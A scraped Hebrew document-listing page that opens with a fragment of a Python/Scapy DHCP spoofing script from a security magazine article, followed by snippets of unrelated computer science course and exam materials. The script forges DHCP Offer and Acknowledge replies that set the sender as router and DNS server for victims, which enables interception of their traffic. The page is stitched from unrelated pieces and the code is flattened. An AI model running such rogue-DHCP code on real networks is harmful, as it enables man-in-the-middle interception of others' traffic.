Build a DHCP Offer packet and send to victim if (packet[dhcp].options[0][1] == DHCP_DISCOVER_TYPE): print("sending Offer Packet!") ether_layer = Ether(src = MY_COMPUTER_MAC, dst = BROADCAST_MAC) ip_layer = IP(src = MY_COMPUTER_IP, dst = BROADCAST_IP) udp = UDP(sport = BOOTPS, dport = BOOTPC) bootp = BOOTP(op = BOOTP_REPLY_OP_CODE, xid = packet[bootp].xid, yiaddr = victim_ip_offer, siaddr = MY_COMPUTER_IP, chaddr = packet[bootp].chaddr, sname = packet[bootp].sname, file = packet[bootp].file, options = packet[bootp].options) dhcp = DHCP(options = [ ('message-type', DHCP_OFFER_TYPE), ('subnet_mask', ' '), ('time_zone', b'\x00\x00\x00\x00'), ('router', MY_COMPUTER_IP), ('default_ttl', b'@'), ('lease_time', 3600), ('server_id', MY_COMPUTER_IP), ('renewal_time', 1800), ('rebinding_time', 3150), ('name_server', DNS_SERVER_IP), 'end', 'pad']) packet_to_send = ether_layer / ip_layer / udp / bootp / dhcp # Build a DHCP Acknowledge packet and send to victim elif (packet[dhcp].options[0][1] == DHCP_REQUEST_TYPE): print("sending Acknowledge Packet!") ether_layer = Ether(src = MY_COMPUTER_MAC, dst = BROADCAST_MAC) ip_layer = IP(src = MY_COMPUTER_IP, dst = BROADCAST_IP) udp = UDP(sport = BOOTPS, dport = BOOTPC) bootp = BOOTP(op = BOOTP_REPLY_OP_CODE, xid = packet[bootp].xid, yiaddr = victim_ip_offer, siaddr = MY_COMPUTER_IP, chaddr = packet[bootp].chaddr, sname = packet[bootp].sname, file = packet[bootp].file, options = packet[bootp].options) dhcp = DHCP(options = [ ('message-type', DHCP_ACKNOWLEDGE_TYPE), ('subnet_mask', ' '), ('time_zone', b'\x00\x00\x00\x00'), ('router', MY_COMPUTER_IP), ('default_ttl', b'@'), ('lease_time', 3600), ('server_id', MY_COMPUTER_IP), ('renewal_time', 1800), ('rebinding_time', 3150), ('name_server', DNS_SERVER_IP), 'end', 'pad']) 22 DHCP Spoofing Attack גליון 115, פברואר 2020

23 vacant_ips.remove(vacant_ips[len(vacant_ips) - 1]) victim_ips.append(victim_ip_offer) packet_to_send = ether_layer / ip_layer / udp / bootp / dhcp sendp(packet_to_send, socket = socket_send) def main(): # Finding vacant IP'S To give the victims find_vacant_ip_address(ip_count = 1) # Sniffing to find DHCP Discovery / Request packets in order to answer them sniff(lfilter = filter_dhcp_packets, prn = build_dhcp_response_packets) if name == ' main ': main() DHCP Spoofing Attack פברואר,115 גליון

PowerPoint Presentation

PowerPoint Presentation מבוא למדעי המחשב תירגול 6: כתובות ומצביעים 1 תוכנייה מצביעים מצביעים ומערכים, אריתמטיקה של מצביעים 2 3 מצביעים תזכורת- כתובות זיכרון הזיכרון כתובת התא #1000 #1004 #1008 ערך השמור בתא תא 10-4 לא מאותחל

קרא עוד

Slide 1

Slide 1 מבוא למדעי המחשב תירגול 4: משתנים בוליאניים ופונקציות מבוא למדעי המחשב מ' - תירגול 4 1 משתנים בוליאניים מבוא למדעי המחשב מ' - תירגול 4 2 ערכי אמת מבחינים בין שני ערכי אמת: true ו- false לכל מספר שלם ניתן

קרא עוד

הסבר על HSRP, VRRP, GLBP

הסבר על HSRP, VRRP, GLBP הסבר על HSRP, VRRP, GLBP FHRP First Hop Redundancy Protocols הוא תחום רחב ליתירות בעולם הRtouers על מנת שמחשב שיש לו Default Gateway ימשיך לעבוד גם אם הראוטר שדרכו מחשב זה מנתב לכל רשת אחרת יפול אז באופן

קרא עוד

שאלהIgal : מערכים דו מימדיים רקורסיה:

שאלהIgal : מערכים דו מימדיים רקורסיה: אוניברסיטת בן גוריון בנגב מספר נבחן : תאריך המבחן: כ"ג מנ' אב תשע"ז 15.08.17 שמות המורים: ציון סיקסיק א' ב- C תכנות מבחן ב: 202-1-9011 מס' הקורס : הנדסה מיועד לתלמידי : ב' מועד סמ' ב' שנה תשע"ז 3 שעות

קרא עוד

Office 365 ProPlus בחינם לסטודנטים באוניברסיטת בן גוריון בנגב הוראות סטודנטים באוניברסיטת בן גוריון בנגב יכולים להוריד ולהתקין את חבילת התוכנה Office

Office 365 ProPlus בחינם לסטודנטים באוניברסיטת בן גוריון בנגב הוראות סטודנטים באוניברסיטת בן גוריון בנגב יכולים להוריד ולהתקין את חבילת התוכנה Office Office 365 ProPlus בחינם לסטודנטים באוניברסיטת בן גוריון בנגב הוראות סטודנטים באוניברסיטת בן גוריון בנגב יכולים להוריד ולהתקין את חבילת התוכנה Office 365 ProPlus בחינם. ניתן להוריד ולהתקין את הגרסאות הבאות:

קרא עוד

שבוע 4 סינטקס של HACK ASSEMBLY ניתן להשתמש בשלושה אוגרים בלבד:,A,D,M כולם בעלי 16 ביטים. M אינו אוגר ישיר- הוא מסמן את האוגר של ה RAM שאנחנו מצביעים ע

שבוע 4 סינטקס של HACK ASSEMBLY ניתן להשתמש בשלושה אוגרים בלבד:,A,D,M כולם בעלי 16 ביטים. M אינו אוגר ישיר- הוא מסמן את האוגר של ה RAM שאנחנו מצביעים ע שבוע 4 סינטקס של HACK ASSEMBLY ניתן להשתמש בשלושה אוגרים בלבד:,A,D,M כולם בעלי 16 ביטים. M אינו אוגר ישיר- הוא מסמן את האוגר של ה RAM שאנחנו מצביעים עליו כרגע )A מצביע עליו(. יש שני סוגי פקודות, פקודת

קרא עוד

Microsoft PowerPoint - meli-iso.ppt

Microsoft PowerPoint - meli-iso.ppt דגשים לעבודה עם פרוטוקול ISOILL בהשאלה בין-ספרייתית יוסי ט יסו נה המסלול האק דמי ה מכללה למי נהל יום הדרכה של מאלי בנושא השאלה והשאלה בין-ספרייתית יולי 2010 - אוניברסיטת בן-גוריון בנגב פרוטוקול ISOILL

קרא עוד

הגנה - שקפי תרגול

הגנה - שקפי תרגול תרגול 9 סיסמאות חד פעמיות הגנה במערכות מתוכנתות )הגנה ברשתות( חורף תשע"ז 1 תזכורת בקרת כניסה אימות זהות המשתמש למניעת התחזות קבלת שירות שהתוקף אינו זכאי לו קבלת גישה למידע פרטי ולביצוע פעולות בד"כ נעשה

קרא עוד

תוכנית לימודים להתמחות תכנון ותכנות מערכות הגנת סייבר

תוכנית לימודים להתמחות תכנון ותכנות מערכות הגנת סייבר תוכנית לימודים להתמחות תכנון ותכנות מערכות הגנת סייבר צוות תוכנית הלימודים כתיבה )לפי סדר א"ב( איגור בוגודלוב לטם גיא עדי שהרבני עמרי אילדיס רמי עמר שלומי בוטנרו שלומי הוד עריכה שלומי הוד ש 6 ש 9 מבוא

קרא עוד

אוניברסיטת חיפה החוג למדעי המחשב מרצה: שולי וינטנר מתרגלים: נעמה טוויטו, מחמוד שריף מבוא למדעי המחשב סמסטר א' תשע"ב בחינת סיום, מועד א', הנחי

אוניברסיטת חיפה החוג למדעי המחשב מרצה: שולי וינטנר מתרגלים: נעמה טוויטו, מחמוד שריף מבוא למדעי המחשב סמסטר א' תשעב בחינת סיום, מועד א', הנחי אוניברסיטת חיפה החוג למדעי המחשב מרצה: שולי וינטנר מתרגלים: נעמה טוויטו, מחמוד שריף מבוא למדעי המחשב סמסטר א' תשע"ב בחינת סיום, מועד א', 6.2.2012 הנחיות: 1. משך הבחינה: 120 דקות. 2. היציאה מהכיתה במהלך

קרא עוד

סדנת תכנות ב C/C++

סדנת תכנות ב   C/C++ פקולטה: מדעי הטבע מחלקה: מדעי המחשב שם הקורס: מבוא למחשבים ושפת C קוד הקורס: 2-7028510 תאריך בחינה: 15.2.2017 משך הבחינה: שעתיים שם המרצה: ד"ר אופיר פלא חומר עזר: פתוח שימוש במחשבון: לא הוראות כלליות:

קרא עוד

מבוא לתכנות ב- JAVA תרגול 7

מבוא לתכנות ב- JAVA  תרגול 7 מבוא לתכנות ב- JAVA תרגול 8 תזכורת - מבנה של פונקציה רקורסיבית.2 פונקציה רקורסיבית מורכבת משני חלקים עיקריים 1. תנאי עצירה: מקרה/מקרים פשוטים בהם התוצאה לא מצריכה קריאה רקורסיבית לחישוב צעד רקורסיבי: קריאה

קרא עוד

הסבר והגדרת Cisco NTP ומהו Stratum,הסבר על DHCP על DHCP Relay Agent והגדרת IP Helper,הגדרת DHCP בCisco Router,הסבר על IPv6,הסבר על Switch Virtual Inte

הסבר והגדרת Cisco NTP ומהו Stratum,הסבר על DHCP על DHCP Relay Agent והגדרת IP Helper,הגדרת DHCP בCisco Router,הסבר על IPv6,הסבר על Switch Virtual Inte הסבר והגדרת Cisco NTP ומהו Stratum הסבר והגדרת Cisco NTP *במעבדה זו השתמשתי בראוטר 3745* NTP הוא קיצור של Network Time Protocol הוא שרת שעון, מטרתו היא לסנכרן את כל השרתים, מחשבים, סוויצים, ראוטרים וכו

קרא עוד

תוכנית לימודים להתמחות הגנת סייבר מהדורה רביעית צוות תוכנית הלימודים מהדורה שלישית כתיבה ועריכה )לפי סדר א"ב( תומר גלון צוות תוכנית הלימודים מהדורה שנ

תוכנית לימודים להתמחות הגנת סייבר מהדורה רביעית צוות תוכנית הלימודים מהדורה שלישית כתיבה ועריכה )לפי סדר אב( תומר גלון צוות תוכנית הלימודים מהדורה שנ תוכנית לימודים להתמחות הגנת סייבר מהדורה רביעית צוות תוכנית הלימודים מהדורה שלישית כתיבה ועריכה )לפי סדר א"ב( תומר גלון צוות תוכנית הלימודים מהדורה שנייה כתיבה ועריכה )לפי סדר א"ב( איריס צור ברגורי עומר

קרא עוד

שאלהIgal : מערכים דו מימדיים רקורסיה:

שאלהIgal : מערכים דו מימדיים רקורסיה: אוניברסיטת בן גוריון בנגב מספר נבחן : תאריך המבחן: כ"ג חשון תשע"ח 12/11/17 שמות המורים: ציון סיקסיק א' ב- C תכנות מבחן ב: 202-1-9011 מס' הקורס : הנדסה מיועד לתלמידי : ב' מועד קיץ סמ' שנה תשע"ז 3 שעות משך

קרא עוד

PowerPoint Presentation

PowerPoint Presentation תכנות מתקדם בשפת Java אוניברסיטת תל אביב 1 תוכנה 1 תרגול 3: עבודה עם מחרוזות )Strings( מתודות )Methods( 1 תכנות מתקדם בשפת Java אוניברסיטת תל אביב 2 מחרוזות )STRINGS( 3 מחרוזות String s = Hello ; מחרוזות

קרא עוד

PowerPoint Presentation

PowerPoint Presentation פרוטאוס הדרכה לפיתוח פרויקט מבוסס ארדואינו 1 הוראות הפעלה תוכנת פרוטאוס מכילה כמות גדולה מאוד של כלי עזר להבנת דרך ההפעלה של התוכנה. שני מקורות מידע עיקריים עומדים לרשות המשתמש מחוץ לתוכנה: o באתר האינטרנט

קרא עוד

Real Time College Course: Networking Duration: 90 Hours Hands-On-Training

Real Time College Course: Networking Duration: 90 Hours Hands-On-Training Real Time College Course: Networking Duration: 90 Hours Hands-On-Training אנחנו? קבוצת Real Time Group הוקמה בשנת 2007, החברה מספקת פתרונות עסקיים וטכנולוגיים בתחומי התוכנה, החומרה והתקשורת, פיתוח ותמיכה

קרא עוד

DCA & A/B Testing

DCA & A/B Testing כלים מתקדמים לבדיקת קריאייטיב בפייסבוק Yan (Yanko) Kotliarsky Digital Marketing Strategist www.yanyanko.com @social.yanko Split Test (A/B Testing) Split Test (A/B Testing) עד לא מזמן, כדי לענות על השאלות

קרא עוד

Homework Dry 3

Homework Dry 3 Homework Dry 3 Due date: Sunday, 9/06/2013 12:30 noon Teaching assistant in charge: Anastasia Braginsky Important: this semester the Q&A for the exercise will take place at a public forum only. To register

קרא עוד

משימה תכנית המתרגמת קטעי טקסט לשפה אחרת הקלט: קובץ המכיל את קטעי הטקסט וכן את השפה אליה רוצים לתרגם תרגול מס' 4: המתרגם שימוש במחלקות קיימות תכנות מתק

משימה תכנית המתרגמת קטעי טקסט לשפה אחרת הקלט: קובץ המכיל את קטעי הטקסט וכן את השפה אליה רוצים לתרגם תרגול מס' 4: המתרגם שימוש במחלקות קיימות תכנות מתק משימה תכנית המתרגמת קטעי טקסט לשפה אחרת הקלט: קובץ המכיל את קטעי הטקסט וכן את השפה אליה רוצים לתרגם תרגול מס' 4: המתרגם שימוש במחלקות קיימות 2 הפשטה שאלות כצעד ראשון נפתור בעיה הרבה יותר פשוטה האם כבר

קרא עוד

2013/14 אוניברסיטת חיפה מבוא למדעי מחשב, מעבדה מטרת המעבדה: לתרגל את המעבר מאלגוריתם לקוד C כמה שיותר. הוראות:.1.2 ניתן לעבוד ביחידים או בזוגות. (יש מ

2013/14 אוניברסיטת חיפה מבוא למדעי מחשב, מעבדה מטרת המעבדה: לתרגל את המעבר מאלגוריתם לקוד C כמה שיותר. הוראות:.1.2 ניתן לעבוד ביחידים או בזוגות. (יש מ מטרת המעבדה: לתרגל את המעבר מאלגוריתם לקוד C כמה שיותר. הוראות:.1.2 ניתן לעבוד ביחידים או בזוגות. (יש מספיק עמדות לכולם ולכן מומלץ לעבוד ביחידים). במהלך המעבדה יהיה עליכם לבצע משימות. אם תצטרכו עזרה בשלב

קרא עוד

מספר זהות: סמסטר ב' מועד א' תאריך: 11102/4// שעה: 9:22 משך הבחינה: 3 שעות חומר עזר: אין מותר השימוש במחשבון פשוט בחינה בקורס: מבני נתונים מרצה: הדר בי

מספר זהות: סמסטר ב' מועד א' תאריך: 11102/4// שעה: 9:22 משך הבחינה: 3 שעות חומר עזר: אין מותר השימוש במחשבון פשוט בחינה בקורס: מבני נתונים מרצה: הדר בי מספר זהות: סמסטר ב' מועד א' תאריך: 11102/4// שעה: 9:22 משך הבחינה: 3 שעות חומר עזר: אין מותר השימוש במחשבון פשוט בחינה בקורס: מבני נתונים מרצה: הדר בינסקי הנחיות: יש לענות על כל השאלות. יש לענות על כל

קרא עוד

מדריך להתקנת Code Blocks מדריך זה נועד לתאר את תהליך התקנת התוכנה של הקורס "מבוא למחשב שפת C". בקורס נשתמש בתוכנת Code::Blocks עם תוספת )אשף( המתאימה

מדריך להתקנת Code Blocks מדריך זה נועד לתאר את תהליך התקנת התוכנה של הקורס מבוא למחשב שפת C. בקורס נשתמש בתוכנת Code::Blocks עם תוספת )אשף( המתאימה מדריך להתקנת Code Blocks מדריך זה נועד לתאר את תהליך התקנת התוכנה של הקורס "מבוא למחשב שפת C". בקורס נשתמש בתוכנת Code::Blocks עם תוספת )אשף( המתאימה לקורס. האשף קובע את סביבת הפיתוח כך שתתאים לצורכי הקורס.

קרא עוד

מספר מחברת: עמוד 1 מתוך 11 ת"ז: תשע"א מועד ב סמסטר א' תאריך: 00:11 שעה: 0 שעות הבחינה: משך כל חומר עזר אסור בשימוש בחינה בקורס: מבוא למדעי ה

מספר מחברת: עמוד 1 מתוך 11 תז: תשעא מועד ב סמסטר א' תאריך: 00:11 שעה: 0 שעות הבחינה: משך כל חומר עזר אסור בשימוש בחינה בקורס: מבוא למדעי ה עמוד 1 מתוך 11 תשע"א מועד ב סמסטר א' 14.2.2011 תאריך: 00:11 שעה: 0 שעות הבחינה: משך כל חומר עזר אסור בשימוש בחינה בקורס: מבוא למדעי המחשב יש לענות על כל 5 השאלות. בכל השאלות במבחן יש לכתוב פונקציות יעילות

קרא עוד

אוניברסיטת חיפה החוג למדעי המחשב.5.6 מבוא למדעי המחשב סמסטר א' תשע"ז בחינה סופית מועד א', מרצה: שולי וינטנר מתרגלים: סמאח אידריס, ראמי עילבו

אוניברסיטת חיפה החוג למדעי המחשב.5.6 מבוא למדעי המחשב סמסטר א' תשעז בחינה סופית מועד א', מרצה: שולי וינטנר מתרגלים: סמאח אידריס, ראמי עילבו אוניברסיטת חיפה החוג למדעי המחשב.5.6 מבוא למדעי המחשב סמסטר א' תשע"ז בחינה סופית מועד א', 31.1.2017 מרצה: שולי וינטנר מתרגלים: סמאח אידריס, ראמי עילבוני, דולב שרון הנחיות: 1. משך הבחינה: 120 דקות. 2. היציאה

קרא עוד

יצוא לחשבשבת תוכן עיניינים הגדרות - חשבונות בנק...2 הגדרות - הגדרות חשבשבת... 3 הגדרות - כרטיסי אשראי... 4 הגדרות - סוגי הכנסה... 5 יצוא לחשבשבת...6 י

יצוא לחשבשבת תוכן עיניינים הגדרות - חשבונות בנק...2 הגדרות - הגדרות חשבשבת... 3 הגדרות - כרטיסי אשראי... 4 הגדרות - סוגי הכנסה... 5 יצוא לחשבשבת...6 י יצוא לחשבשבת תוכן עיניינים הגדרות - חשבונות בנק...2 הגדרות - הגדרות חשבשבת... 3 הגדרות - כרטיסי אשראי... 4 הגדרות - סוגי הכנסה... 5 יצוא לחשבשבת...6 יצוא קופה לחשבשבת חלונות...01 כללי מדריך זה מסביר את

קרא עוד

מהוא לתכנות ב- JAVA מעבדה 3

מהוא לתכנות ב- JAVA מעבדה 3 מבוא לתכנות ב- JAVA מעבדה 3 נושאי התרגול לולאות ניפוי שגיאות לולאות - הקדמה כיצד הייתם כותבים תוכנית שתדפיס את המספרים השלמים בין 1 ל- 100 בעזרת הכלים שלמדתם עד עתה? חייבת להיות דרך אחרת מאשר לכתוב 100

קרא עוד

תרגיל בית מספר 1#

תרגיל בית מספר 1# ב 4 תרגיל בית מספר - 1 להגשה עד 72 באוקטובר בשעה ::725 קיראו בעיון את הנחיות העבודה וההגשה המופיעות באתר הקורס, תחת התיקייה.assignments חריגה מההנחיות תגרור ירידת ציון / פסילת התרגיל. הנחיות והערות ספציפיות

קרא עוד

מבחן סוף סמסטר מועד א 15/02/08 מרצה אחראית: דר שירלי הלוי גינסברג מתרגלים: גלעד קותיאל, דניאל גנקין הוראות: א. בטופס המבחן 7 עמודים ו 4 דפי נוסחאות. ב

מבחן סוף סמסטר מועד א 15/02/08 מרצה אחראית: דר שירלי הלוי גינסברג מתרגלים: גלעד קותיאל, דניאל גנקין הוראות: א. בטופס המבחן 7 עמודים ו 4 דפי נוסחאות. ב מבחן סוף סמסטר מועד א 15/02/08 מרצה אחראית: דר שירלי הלוי גינסברג מתרגלים: גלעד קותיאל, דניאל גנקין הוראות: א. בטופס המבחן 7 עמודים ו 4 דפי נוסחאות. בדקו שכל העמודים ברשותכם. ב. משך המבחן שלוש שעות (180

קרא עוד

Microsoft Word IG Lab - Configure Wireless Router in Windows Vista.docx

Microsoft Word IG Lab - Configure Wireless Router in Windows Vista.docx עיקרי טכנולוגיות המידע 5.0 6.8.3.9 מעבדה תצורת ראוטר ללא כבלים Router) (Wireless בחלונות ויסטה (Windows Vista) מבוא הדפס והשלם מעבדה זו. במעבדה זו, יהיה עליך להגדיר ולבחון את ההגדרות האלחוטיות על ה.Linksys

קרא עוד

אוניברסיטת חיפה החוג למדעי המחשב מרצה: שולי וינטנר מתרגלים: נעמה טוויטו, מחמוד שריף מבוא למדעי המחשב סמסטר א' תשע"ב בחינת סיום, מועד א', הנחי

אוניברסיטת חיפה החוג למדעי המחשב מרצה: שולי וינטנר מתרגלים: נעמה טוויטו, מחמוד שריף מבוא למדעי המחשב סמסטר א' תשעב בחינת סיום, מועד א', הנחי אוניברסיטת חיפה החוג למדעי המחשב מרצה: שולי וינטנר מתרגלים: נעמה טוויטו, מחמוד שריף מבוא למדעי המחשב סמסטר א' תשע"ב בחינת סיום, מועד א', 6.2.2012 הנחיות: 1. משך הבחינה: 120 דקות. 2. היציאה מהכיתה במהלך

קרא עוד

הוספת קישור לאתר אינטרנט תוכן ממשק בדיקת מטלות...3 איחוד אתרי קורסים...5 סל מחזור... 7 חידושים בפעילויות...8 תצורת קורס: כפתורים... 9 פורומים...10 שיפ

הוספת קישור לאתר אינטרנט תוכן ממשק בדיקת מטלות...3 איחוד אתרי קורסים...5 סל מחזור... 7 חידושים בפעילויות...8 תצורת קורס: כפתורים... 9 פורומים...10 שיפ הוספת קישור לאתר אינטרנט תוכן ממשק בדיקת מטלות...3 איחוד אתרי קורסים...5 סל מחזור... 7 חידושים בפעילויות...8 תצורת קורס: כפתורים... 9 פורומים...10 שיפורים נוספים... 11 1 Moodle חדש במערכת ה- מערכת מודל

קרא עוד

הגשה תוך שבוע בשעת התרגול

הגשה תוך שבוע בשעת התרגול מרצה: שולי וינטנר. מתרגל: שלמה יונה מבוא למדעי המחשב מועד ב', סמסטר א' תשס"ג, 17/2/03 משך המבחן: שעתיים וחצי. חומר עזר: מותר כל חומר עזר, מלבד מחשב. הנחיות: ודאו כי בטופס שבידיכם 8 עמודים. יש לכתוב את

קרא עוד

מבחן 7002 פרטים כלליים מועד הבחינה: בכל זמן מספר השאלון: 1 משך הבחינה: 3 שעות חומר עזר בשימוש: הכל )ספרים ומחברות( המלצות: קרא המלצות לפני הבחינה ובדי

מבחן 7002 פרטים כלליים מועד הבחינה: בכל זמן מספר השאלון: 1 משך הבחינה: 3 שעות חומר עזר בשימוש: הכל )ספרים ומחברות( המלצות: קרא המלצות לפני הבחינה ובדי מבחן 7002 פרטים כלליים מועד הבחינה: בכל זמן מספר השאלון: 1 משך הבחינה: 3 שעות חומר עזר בשימוש: הכל )ספרים ומחברות( המלצות: קרא המלצות לפני הבחינה ובדיקות אחרונות לפני מסירה )עמודים 8-11( מבנה השאלון 5

קרא עוד

תכנות בשפת פייתון ברק גונן

תכנות בשפת פייתון ברק גונן תכנות בשפת פייתון ברק גונן תכנות בשפת פייתון Python Programming / Barak Gonen גרסה 1.03 כתיבה: ברק גונן עריכה: עומר רוזנבוים אין לשכפל, להעתיק, לצלם, להקליט, לתרגם, לאחסן במאגר מידע, לשדר או לקלוט בכל

קרא עוד

פתרון מוצע לבחינת מה"ט ב_שפת c מועד ב אביב תשע"ט, אפריל 2019 מחברת: גב' זהבה לביא, מכללת אורט רחובות שאלה מספר 1 מוגדרת מחרוזת המורכבת מהספרות 0 עד 9.

פתרון מוצע לבחינת מהט ב_שפת c מועד ב אביב תשעט, אפריל 2019 מחברת: גב' זהבה לביא, מכללת אורט רחובות שאלה מספר 1 מוגדרת מחרוזת המורכבת מהספרות 0 עד 9. פתרון מוצע לבחינת מה"ט ב_שפת c מועד ב אביב תשע"ט, אפריל 2019 מחברת: גב' זהבה לביא, מכללת אורט רחובות שאלה מספר 1 מוגדרת מחרוזת המורכבת מהספרות 0 עד 9. הדפסה ראשונה: מתבצעת לולאה שרצה מאפס עד אורך המחרוזת.

קרא עוד

דוגמאות שהוצגו בהרצאה 10 בקורס יסודות מערכות פתוחות דוגמה 1 דוגמאות של פונקציות ב- awk שמראות שהעברת פרמטרים של משתנים פשוטים היא by value והעברת פרמט

דוגמאות שהוצגו בהרצאה 10 בקורס יסודות מערכות פתוחות דוגמה 1 דוגמאות של פונקציות ב- awk שמראות שהעברת פרמטרים של משתנים פשוטים היא by value והעברת פרמט דוגמאות שהוצגו בהרצאה 10 בקורס יסודות מערכות פתוחות דוגמה 1 דוגמאות של פונקציות ב- awk שמראות שהעברת פרמטרים של משתנים פשוטים היא by value והעברת פרמטרים של מערכים היא by reference וכן דוגמאות שמראות שמשתנים

קרא עוד

Microsoft Word B

Microsoft Word B מרצה: שולי וינטנר. מתרגל: שלמה יונה מבוא למדעי המחשב מועד ב', סמסטר א' תשס"ג, 17/2/03 משך המבחן: שעתיים וחצי. חומר עזר: מותר כל חומר עזר, מלבד מחשב. הנחיות: 1. ודאו כי בטופס שבידיכם 8 עמודים. יש לכתוב

קרא עוד

מבוא למדעי המחשב

מבוא למדעי המחשב מבוא למדעי המחשב שימוש במחסנית - מחשבון תוכן עניינים prefix כתיבת ביטויים ב-,infix ו- postfix postfix prefix,infix ביטויים ב- כתיבת ו- infix נוסח כתיבה ב- (operator אנו רגילים לכתוב ביטויים חשבוניים כדוגמת

קרא עוד

תכנות מונחה עצמים א' – תש"ע

תכנות מונחה עצמים א' –  תשע 1 תכנות מונחה עצמים והנדסת תוכנה תשע"ו 2 בנאי העתקה בניית העתק של אובייקט קיים. בניית העתק בעת העברת אובייקט לפונקציה. בניית העתק בעת החזרת אובייקט מפונקציה. ניתן להגדיר בנאי העתקה. אם לא מגדירים, אז הקומפיילר

קרא עוד

Slide 1

Slide 1 מבוא למדעי המחשב תירגול 7: פונקציות 1 מה היה שבוע שעבר? לולאות מערכים מערכים דו-ממדיים 2 תוכנייה )call by value( פונקציות העברת פרמטרים ע"י ערך תחום הגדרה של משתנה מחסנית הקריאות 3 פונקציות 4 הגדרה של

קרא עוד

מצגת של PowerPoint

מצגת של PowerPoint מבוא כללי לתכנות ולמדעי המחשב תרגול מס' 1 דין שמואל dshmuel110@gmail.com 1 1. מנהלות מרצה: אמיר רובינשטיין, amirr@tau.ac.il שעות קבלה: לשאלות קצרות - מייד לאחר השיעור. ניתן לתאם במייל שעות אחרות. מתרגל:

קרא עוד

Microsoft PowerPoint - rec3.ppt

Microsoft PowerPoint - rec3.ppt תכנו ת מונח ה עצ מים משתני מחלקה, עצמים מוכלים ועצמים מוצבעים א וה ד ברז יל י א ונ יברס י ט ת תל אביב משתנ י מח ל קה Static Members משתני מחלקה members) (static משתנים סטטיים מוגדרי ם בתוך מח לקה ואולם

קרא עוד

מבוא למדעי המחשב

מבוא למדעי המחשב מבוא למדעי המחשב מחרוזות, חתימה של פונקציה ומעטפות תוכן עניינים טיפוסים מורכבים טיפוסים מורכבים ערך שם טיפוס 12 m int undef. x boolean true y boolean arr int[] כאלה שעשויים להכיל יותר מערך פרימיטיבי אחד

קרא עוד

מערכות הפעלה קורס מס'

מערכות הפעלה קורס מס' מערכות קבצים מבוזרות מבוא מבנה כללי דוגמה: Network file system דוגמה: Google file system 1 חגית עטיה מערכות קבצים מבוזרות מאפשרות לתהליכים אשר רצים במכונות שונות, גישה ושיתוף קבצים שקיפות לאפליקציה: אפליקציה

קרא עוד

פרויקט "רמזור" של קרן אביטל בס "ד מערך שיעור בנושא: "פונקציה" טליה קיפניס והדסה ערמי, מאולפנת צביה פרטים מקדימים על מערך השיעור: השיעור מהווה מבוא לנו

פרויקט רמזור של קרן אביטל בס ד מערך שיעור בנושא: פונקציה טליה קיפניס והדסה ערמי, מאולפנת צביה פרטים מקדימים על מערך השיעור: השיעור מהווה מבוא לנו בס "ד מערך שיעור בנושא: "פונקציה" טליה קיפניס והדסה ערמי, מאולפנת צביה פרטים מקדימים על מערך השיעור: השיעור מהווה מבוא לנושא הפונקציות הנלמד בכתה ט' בכל הרמות. עזרי ההוראה בהם נשתמש: מחשב, ברקו, דפי עבודה

קרא עוד

Microsoft Word - Ass1Bgu2019b_java docx

Microsoft Word - Ass1Bgu2019b_java docx ת ר ג י ל 1 ב ק ו ר ס מ ב ו א לתכנות 202.1.9031 JAVA סמסטר ב, ת נ א י ם ו ל ו ל א ו ת תאריך אחרון להגשה בציון מלא : 02.04.19 עד שעה : 23:55, כ ל יום איחור ל א מ א ו ש ר א ו ח ל ק ממנו מודריד 10 נקודות

קרא עוד

Slide 1

Slide 1 מבוא לשפת C תירגול 8: פונקציות שבוע שעבר... מערכים מיזוג מערכים ממויינים מערכים דו-ממדיים מבוא לשפת סי - תירגול 8 2 תוכנייה פונקציות ברמת התקשורת הבין-אישית חלוקה לתתי בעיות בדומה למפתח של ספר קריאות גבוהה

קרא עוד

אוניברסיטת בן גוריון בנגב תאריך המבחן: שקולניק אלכסנדר שם המרצה: מר בשפת JAVA מבוא לתכנות מבחן ב: מס' הקורס : הנדסת תעשיה וניהול מ

אוניברסיטת בן גוריון בנגב תאריך המבחן: שקולניק אלכסנדר שם המרצה: מר בשפת JAVA מבוא לתכנות מבחן ב: מס' הקורס : הנדסת תעשיה וניהול מ אוניברסיטת בן גוריון בנגב תאריך המבחן: 12.02.17 שקולניק אלכסנדר שם המרצה: מר בשפת JAVA מבוא לתכנות מבחן ב: 202.1.9031 מס' הקורס : הנדסת תעשיה וניהול מיועד לתלמידי : א' מועד א' סמ' שנה תשע"ד 3 שעות משך

קרא עוד

מבוא למדעי המחשב

מבוא למדעי המחשב מבוא למדעי המחשב תכנות מונחה אובייקטים תוכן עניינים טיפוסי נתונים מורכבים המחלקה String תזכורת לשימוש שעשינו במחלקה String str = new String( Hello ); s.o.p(str.tostring()); s.o.p(str.charat(4)); s.o.p(str.equals(

קרא עוד

תוכנה חופשית מאחורי הקלעים? על סדר היום: קצת על עצמי מה זאת תוכנה חופשית? ההיסטוריה של תוכנה חופשית כיצד תוכנה חופשית משתלבת בשוק התוכנה היתרונות של ת

תוכנה חופשית מאחורי הקלעים? על סדר היום: קצת על עצמי מה זאת תוכנה חופשית? ההיסטוריה של תוכנה חופשית כיצד תוכנה חופשית משתלבת בשוק התוכנה היתרונות של ת תוכנה חופשית מאחורי הקלעים? על סדר היום: קצת על עצמי מה זאת תוכנה חופשית? ההיסטוריה של תוכנה חופשית כיצד תוכנה חופשית משתלבת בשוק התוכנה היתרונות של תוכנה חופשית. דוגמאות מהשטח 1 ליאור קפלן 30/11/05 קצת

קרא עוד

תרגול 1

תרגול 1 מבוא למדעי המחשב 2019 תרגול 5 מחרוזות, חתימות ורקורסיה מחרוזות רצף של תווים רקורסיה קריאה של מתודה לעצמה באופן ישיר או עקיף ראינו בהרצאה מחרוזות: תווים, חתימות: העמסה- String,הצהרה, overloading אתחול רקורסיה:

קרא עוד

מבוא למדעי המחשב

מבוא למדעי המחשב מבוא כללי לתכנות ולמדעי המחשב 1843-0310 מרצה: אמיר רובינשטיין מתרגל: דין שמואל אוניברסיטת תל אביב סמסטר חורף 2017-8 חלק ב - מבוא לקריפטוגרפיה שיעור 5 (offset מונחים בסיסיים צופן קיסר (היסט,.1.2 1 Today

קרא עוד

People. Partnership. Trust מסלול Free פורטל החינוך מבית U-BTech מסלולים ומחירים חיבור לשירותי Office 365 ללא עלות פורטל התחברות הכולל ממשק למנב"ס ולסי

